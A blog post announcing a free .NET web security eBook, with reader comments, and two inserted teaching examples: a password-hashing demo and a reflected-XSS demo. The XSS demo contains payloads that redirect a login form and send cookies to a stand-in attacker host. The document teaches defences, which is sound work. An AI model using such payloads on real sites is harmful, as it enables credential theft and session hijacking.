Writing this series was an epic adventure in all senses of the word:
Duration – 19 months to complete a blog series, for crying out loud!
Content – approaching 50,000 words, not including all the discussion in comments.
Effort – some of the posts, such as transport layer security, probably approached 100 hours of reading, trialling, experimenting and finally, writing and proofing. This is why there was a four month “hiatus” before that post!
But most of all, it was an epic learning adventure for me. Writing the series forced me to know this content in depth, not just the depth that facilitates casual conversation and allows me to send people off to figure out how to fix their flaws, but the depth to really get to grips with these risks, ensure I could exploit them and then make sure I could fix them again.
For example, I knew – and many of us know – that unsalted hashes are vulnerable to a rainbow table attack, but I’d never actually executed one of these attacks myself. So I did. Same again on sniffing packets: knowing that a lack of transport protection leaves network traffic vulnerable is one thing; sitting in the car outside McDonald’s and actually capturing wifi traffic and hijacking the session (my own, that is!) is another thing altogether.
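To make the first of those two points concrete, here is an added example (not code from the series) showing why an unsalted hash falls to a precomputed table and why a per-user salt with a slow KDF stops the table being reused. The wordlist, user records and hashing schemes are constructed for illustration; a real rainbow table is a space-compressed form of the plain lookup table built here, and the same defence applies.

```python
"""Added example (not from the series itself): why an unsalted hash can be
reversed with a precomputed table, and why a per-user salt stops table reuse.
The wordlist and user records below are constructed; a real rainbow table is a
space-compressed form of the plain lookup table built here."""
import hashlib
import os
from typing import Dict, Iterable, Optional

# Constructed stand-in for the wordlist an attacker precomputes offline.
WORDLIST = ["password", "123456", "letmein", "qwerty", "monkey", "dragon"]


def unsalted_hash(password: str) -> str:
    """Legacy scheme: MD5 of the password alone. Same input, same hash, on every site."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def build_lookup_table(wordlist: Iterable[str]) -> Dict[str, str]:
    """Built once, reused against every unsalted hash ever leaked: hash -> plaintext."""
    return {unsalted_hash(w): w for w in wordlist}


def crack_unsalted(stored_hash: str, table: Dict[str, str]) -> Optional[str]:
    """Recovering an unsalted hash costs a single dictionary lookup."""
    return table.get(stored_hash)


def new_salt() -> bytes:
    """16 random bytes per user, stored alongside the hash (it need not be secret)."""
    return os.urandom(16)


def salted_hash(password: str, salt: bytes, iterations: int = 50_000) -> str:
    """Per-user salt plus a deliberately slow KDF (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations).hex()


def crack_salted(stored_hash: str, salt: bytes, wordlist: Iterable[str],
                 iterations: int = 50_000) -> Optional[str]:
    """With a salt the attacker must redo the KDF for each word, for each user."""
    for w in wordlist:
        if salted_hash(w, salt, iterations) == stored_hash:
            return w
    return None


def demo() -> dict:
    """Two constructed users who chose the same weak password."""
    table = build_lookup_table(WORDLIST)
    alice_plain = unsalted_hash("letmein")
    bob_plain = unsalted_hash("letmein")
    alice_salt, bob_salt = new_salt(), new_salt()
    alice_salted = salted_hash("letmein", alice_salt)
    bob_salted = salted_hash("letmein", bob_salt)
    return {
        # identical hashes reveal the shared password, and one lookup cracks both
        "unsalted_identical": alice_plain == bob_plain,
        "unsalted_cracked": crack_unsalted(alice_plain, table),
        # salted hashes differ even for the same password and miss the precomputed table
        "salted_differ": alice_salted != bob_salted,
        "salted_in_table": alice_salted in table,
        # still crackable, but only by paying the KDF cost against this one user's salt
        "salted_cracked_per_user": crack_salted(alice_salted, alice_salt, WORDLIST),
    }


if __name__ == "__main__":
    print(demo())
```

The salt does not make a weak password strong; `crack_salted` still finds "letmein". What it removes is the one-time precomputation that makes an unsalted dump cheap to crack in bulk, and the iteration count then sets the per-guess price the attacker has to pay for each user separately.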
Looking back on it, I’m really happy with what I’ve produced. It’s been a great experience for me and by all accounts, it’s been very well received by the .NET and OWASP communities as well. It turns out I might have actually produced something pretty useful!
So I decided to turn it into an eBook. Oh – and give it away for free. No strings attached. So here it is, 255 pages of .NET web development security goodness. Please share it generously, chuck it on your eBook reader, email it to your mates, quote me, force your developers to print and read every page – whatever – it’s all yours:
If you find it useful, leave me a comment, flick me an email or fire me through a tweet as the feedback really is appreciated. Happy reading and happy holidays everyone.






Software architect and Microsoft MVP, you’ll usually find me writing about security concepts and process improvement in software delivery.






64 comments:
Just when I thought it couldn't get any better! :-)
Thanks a lot!
This is an excellent resource, thanks for making it available!
Thank you for sharing this excellent and invaluable series on .NET security.
Very nice. Thanks!
Thank you very much. This is a timely book for me
What is OWASP?
"The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software". Check them out at owasp.org
Thank you troy for writing and sharing this excellent series
Too much traffic...
Dropbox says:
"Error (509)
This account's public links are generating too much traffic and have been temporarily disabled!"
Do you have an alternate download location?
Thanks!
ASAFAWeb gives an error trying to download. Your app is sooo secure that it doesn't allow downloads?
Dropbox has disabled your account; you might want to try alternate mirrors.
All fixed - thanks for the heads up!
Re-hosted elsewhere and now working fine.
*Fraction* too fast Eddy - try it again now.
Wow!
Due to changes in the Australian VET Training Package for IT I was going to have to re-write my 'web hacking' subject in the Web Development Diploma. I think that this will provide me with the *perfect* text book for that new subject.
Thank you so much!
.h
p.s. as a 'plug' - Hornsby TAFE, infotech.hornsby.tafensw.edu.au :)
thanks a lot for your great work!
All good now Peter, I've moved it somewhere friendlier. Refresh and retry.
Thank you!
Very nice - Thank you!
Great work, thanks!
Thank you very much. I'm preparing to be a pen tester; it's really awesome work!
Awesome work mate,
although being the snob that I am, is PDF really considered an eBook? ;-)
Thank you ~~ Very Much^^)
I actually saved this series in my Delicious in the past. Thanks for your free ebook, but could you provide us a mobi/epub version so we can read it on ereader such as Kindle?
Hi Tien, I've had a couple of requests for this so I guess I'd better do it! I'll have an opportunity to test a true eBook reader version over the coming weeks so check back soon.
This is a fantastic read and very thorough. Thanks for freely sharing!
Awesome. Great examples and the content is straight to the point.
You are awesome. Thanks :)
Thank you!
Thank you so much!
Thank you very much. This looks really good.
Thanks Troy for the book,
The first example for the XSS attack makes no sense to me. If you are changing a URL parameter in your browser, what does it have to do with me? It's not being changed permanently. Why should I be worried?
Very impressive! Thanks for sharing.
Jumped in your blog some months ago. I bookmarked your series for later read. Now it comes with a free ebook. So great! Wow so great again :)
Hi Patrick, this is what's referred to as a reflected XSS attack where parameters in the URL are used for malicious purposes. The attack vector here is not you changing the parameters in your own browser, rather it's someone else constructing the URL then having you open it with the expectation that it's legitimate.
For example, if I sent you a link to a trusted website with a legitimate domain and that website asked you to authenticate before accessing the content, if it had an XSS vulnerability I could potentially include arbitrary JavaScript which changed the URL of the form action to my own site, thus presenting the opportunity for me to harvest your credentials. Alternatively, the XSS payload may just include script to send me any of your (non-HttpOnly) cookies from the site, which could include the authentication cookie, thus allowing me to hijack your session.
So basically all I need is a vulnerable site and a means of getting you to follow a link to that site. I could attempt to socially engineer you into following it, distribute it via Twitter, shorten it with a URL shortener or even just automatically redirect you from another site. So long as you end up hitting the URL, the attack has succeeded.
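The reflected XSS described in the reply above, as an added example that is not part of the original post or the eBook: a search page on a trusted domain echoes its `q` parameter into the HTML, the attacker builds a link carrying a payload, and the victim's browser runs it. The site name, paths and both payloads (one rewriting the login form's action, one shipping cookies) are constructed; the fix shown is HTML-encoding on output.

```python
"""Added example (not from the series or the reply above): a reflected XSS
where the server echoes a URL parameter into the page. Site, paths and
payloads are constructed for illustration."""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit


def page_for(search_term: str) -> str:
    """The trusted site's search page, which also carries its login form."""
    return (
        "<h1>Results for: " + search_term + "</h1>\n"
        "<form action=\"/login\" method=\"post\">\n"
        "  <input name=\"user\"><input name=\"pass\" type=\"password\">\n"
        "</form>"
    )


def q_param(query_string: str) -> str:
    """Pull q out of the query string; parse_qs undoes the URL encoding."""
    return parse_qs(query_string).get("q", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """The flaw: untrusted input goes into HTML unencoded."""
    return page_for(q_param(query_string))


def render_encoded(query_string: str) -> str:
    """The fix: HTML-encode on output so the browser sees text, not markup."""
    return page_for(html.escape(q_param(query_string), quote=True))


def serve(url: str, encode_output: bool) -> str:
    """Simulate the site handling the full URL the victim clicked."""
    query = urlsplit(url).query
    return render_encoded(query) if encode_output else render_vulnerable(query)


def attacker_url(trusted_site: str, payload: str) -> str:
    """What the attacker sends the victim: a link on the legitimate domain."""
    return f"{trusted_site}/search?q={quote(payload, safe='')}"


# Constructed payloads matching the two outcomes described in the reply.
# 1. Point the site's own login form at the attacker to harvest credentials.
FORM_HIJACK = "<script>document.forms[0].action='https://evil.example/harvest'</script>"
# 2. Send every cookie that is not marked HttpOnly to the attacker.
COOKIE_STEAL = "<img src=x onerror=\"location='https://evil.example/c?'+document.cookie\">"


def markup_injected(page: str) -> bool:
    """Did a script or img tag the page never intended end up in the HTML?"""
    return re.search(r"<(script|img)\b", page, re.IGNORECASE) is not None


def demo() -> dict:
    site = "https://trusted.example"
    hijack = attacker_url(site, FORM_HIJACK)
    steal = attacker_url(site, COOKIE_STEAL)
    return {
        "link_is_on_trusted_domain": urlsplit(hijack).netloc == "trusted.example",
        "vulnerable_runs_script": markup_injected(serve(hijack, encode_output=False)),
        "encoded_runs_script": markup_injected(serve(hijack, encode_output=True)),
        "cookie_payload_vulnerable": markup_injected(serve(steal, encode_output=False)),
        "cookie_payload_encoded": markup_injected(serve(steal, encode_output=True)),
    }


if __name__ == "__main__":
    print(demo())
```

Note the two defences are complementary: marking the authentication cookie HttpOnly blunts the cookie payload but does nothing about the form-action rewrite, whereas encoding at the point of output neutralises both, which is why the output encoding is the fix and HttpOnly is a second layer.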
Thank you for christmas goodies !!
It's really an asset to have material like this. I myself worked on .NET-specific security loophole identification projects, but this is really amazing stuff.
Hehehe Troy, that was quick. Last week I suggested you write a book and you gave me the suggestion of Beginning ASP.NET Security. Now you have written your own. I still think you should write a full-blown book which should cater to medium to expert developers.
thanks
Kamran
Brilliant series of articles Troy - I can see lots of things we can take from them to improve the security of our web applications.
I've also forwarded links to your blog to my developer colleagues!
Steve
Appreciate your great job, thank you so much.
Typo:
Page 77 - "a simple Google search can turn op all sorts of things"
It should be "up", not "op".
BTW, thank you, thank you, thank you!
Thanks Troy. After reading your book, I have started looking at the new work I am doing and making it more secure. Thanks a lot. I have a few things which I want to discuss with you and they are related to security issues. Don't know if this is the right place or not.
regards
Parminder
Ah, thank you very much for that, I've just fixed that one and a couple of others and pushed out doc version 1.0.2.
Just drop me an email if you like Parminder:
troyhunt@hotmail.com
Hi Troy, loving the eBook, still reading...
And a request for the next chapter: ASP.NET MVC 3 (or 4). I'd love to read a follow up comparing WebForms with MVC, as with MVC we are generating more content manually. Is the standard MVC HtmlEncoding better than Server.HtmlEncode / HttpUtility.HtmlEncode or should we still resort to the Anti-XSS library?
I guess this answers my question, but would love to see it explained in a new 'chapter' http://haacked.com/archive/2010/04/06/using-antixss-as-the-default-encoder-for-asp-net.aspx
And perhaps discuss the (limitations of) features of ASP.NET 4 like http://www.asp.net/whitepapers/aspnet4#0.2__Toc253429245 and http://www.asp.net/whitepapers/aspnet4#0.2__Toc253429247
And its future features like
http://www.asp.net/vnext/overview/whitepapers/whats-new#_Toc303354465 to http://www.asp.net/vnext/overview/whitepapers/whats-new#_Toc303354468
Great book, thanks.
Is it possible to create it in ePub/mobi format?
Hi Marcin, a few people have asked for that so it's something I'll work on. Stay tuned.
An excellent resource - the only thing that would make it better for me would be for a mobi version so I can push it to my kindle.
Any luck on the epub format?
In progress, just been a little snowed under lately.
Well, that is probably why you need the book... :-)
Was there any update on being an epub version of this book being available as well, or is it just the PDF?
Not yet Steven, but stay tuned.
Cool thanks. Looking forward to having it for easier reference.
Really amazing book!!!
It's difficult for me to keep in mind all the terminology. How can I get comfortable with .NET and which book should I refer to? Please tell me.
Sounds like you're just starting to learn .NET, in which case this book might be a bit premature. Try reading the resources at www.asp.net or, if you want a physical book, something like Beginning ASP.NET 4.
Hey Troy Hunt, I appreciate your work. Nice to see that guys like you are providing such resources for free. I'm going to announce this post on my blog (itorian.com), so that maximum techies can reach here. Allow me to do this?
Cheers!!
Abhimanyu Kumar Vatsa
Of course, please share generously!
Well deserved MVP status!
Thank you... I'm definitely having a look at your book; I'm very interested in OWASP for ASP.NET.
Great job Troy! Your time and effort are very much appreciated. Keep up the good work!